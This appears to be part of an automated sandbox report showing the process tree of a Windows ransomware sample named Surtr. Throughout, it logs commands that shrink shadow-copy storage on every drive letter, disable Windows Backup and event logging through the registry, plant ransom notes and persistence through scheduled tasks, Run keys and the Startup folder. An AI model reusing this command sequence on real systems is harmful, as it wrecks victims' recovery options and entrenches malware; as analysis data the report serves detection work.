                                                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5268
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5788
                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                            vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                                            3⤵
                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                            PID:1084
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5964
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                                              3⤵
                                                                                                                                                                PID:2396
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5976
                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                  vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                  PID:5040
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5908
                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                    PID:4916
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5900
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1964
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5836
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:728
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:5828
                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                              vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                              PID:3556
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5812
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:764
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:6056
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5660
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:6136
                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                        vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                        PID:5420
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:6128
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4664
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:6080
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2452
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3524
                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                  vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                  PID:5008
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:3136
                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3784
                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                      vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                      PID:5372
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:3008
                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                        vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                        PID:1104
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:5560
                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                          vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                          PID:1984
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1252
                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                            vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                            PID:216
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5248
                                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                              vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                              PID:1936
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4580
                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                PID:4172
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1580
                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3304
                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                    PID:6072
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5060
                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                      vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                      PID:4760
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:2700
                                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                        vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                        PID:2352
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1632
                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                          vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                          PID:4868
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5228
                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2180
                                                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                              vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                                              PID:1312
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:3012
                                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                PID:5168
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:4268
                                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                  PID:4876
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:1744
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                  PID:1548
                                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                    PID:3348
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3876
                                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                      vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                                      PID:5328
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:1064
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:4508
                                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                          vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                                          PID:5676
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:3160
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_okvd1x8i6h1pch.surt" "%TEMP%\Service\PublicData_okvd1x8i6h1pch.surt"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:5172
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_okvd1x8i6h1pch.surt" "%TEMP%\Service\PrivateData_okvd1x8i6h1pch.surt"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:5464
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:476
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:4304
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                                  PID:2596
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:3104
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                      attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                      PID:3000
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:6024
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                        PID:4288
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5004
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                          schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                          PID:2932
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:3936
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                            schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                            PID:4368
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                                                                                          PID:2608
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2676
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                              PID:3580
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:2032
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                PID:5656
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:4828
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                  PID:5824
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:228
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                    PID:1680
                                                                                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                PID:4016
                                                                                                                                                                                                                                                              • C:\Windows\system32\wbengine.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                PID:2356
                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                PID:3688
                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:4316
                                                                                                                                                                                                                                                                • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5524
                                                                                                                                                                                                                                                                  • C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
